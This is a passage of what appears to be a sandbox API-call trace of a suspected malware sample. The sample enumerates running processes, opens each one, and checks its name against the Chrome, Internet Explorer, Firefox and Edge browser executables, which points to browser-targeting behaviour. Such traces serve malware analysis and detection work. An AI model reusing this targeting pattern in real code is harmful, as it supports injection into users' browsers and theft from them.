	[0203.918] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.918] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x2738
	[0203.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.919] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.919] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.919] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.919] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.920] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.920] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x273c
	[0203.920] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.920] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.921] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.921] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.921] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.922] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.922] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x2740
	[0203.922] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.922] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.923] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.923] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.923] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.924] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.925] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x2744
	[0203.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.925] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.925] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.925] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.926] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.926] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.927] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x2748
	[0203.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.927] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.927] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.927] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.928] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.928] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.928] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x274c
	[0203.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.929] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.929] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.929] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.929] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.930] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.930] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x2750
	[0203.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.930] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.931] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.931] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.931] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.932] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0203.932] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x2754
	[0203.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.932] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0203.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.933] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.933] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0203.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.933] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.933] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.934] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x2758
	[0203.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.934] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.935] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.935] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.935] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.935] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0203.936] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x275c
	[0203.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.936] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.936] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.937] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.937] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.937] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0203.938] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x2760
	[0203.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.938] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0203.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.938] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.939] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0203.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.939] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.942] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.942] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x2764
	[0203.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.943] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.943] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.943] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.944] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.944] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0203.944] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x2768
	[0203.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.944] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0203.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.945] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.945] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0203.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.945] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.946] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0203.946] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x276c
	[0203.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.946] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0203.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.947] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.947] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0203.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.947] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.948] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0203.948] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x2770
	[0203.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.948] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0203.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.949] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.949] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0203.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.949] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.949] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0203.950] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x2774
	[0203.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.950] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0203.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.950] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.951] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0203.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.951] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.951] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0203.952] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0203.952] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0203.952] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x2778
	[0203.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.953] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0203.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.953] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.954] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0203.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.954] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.955] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0203.956] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x277c
	[0203.956] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.956] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0203.956] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.956] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.956] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.956] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0203.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.957] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.957] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0203.958] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x2780
	[0203.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.958] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0203.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.959] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.959] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0203.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.959] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.960] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0203.960] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x2784
	[0203.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.960] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0203.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.961] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.961] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0203.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.961] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.962] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0203.962] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x2788
	[0203.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.962] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0203.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.963] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.963] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0203.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.964] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.964] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0203.965] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x278c
	[0203.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.965] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0203.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.965] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.966] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0203.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.966] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.966] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0203.967] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x2790
	[0203.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.967] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0203.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.967] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.968] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.968] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0203.968] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.968] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.968] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0203.969] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x2794
	[0203.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.969] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0203.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.970] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.970] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0203.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.971] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.971] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0203.972] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x2798
	[0203.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.972] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
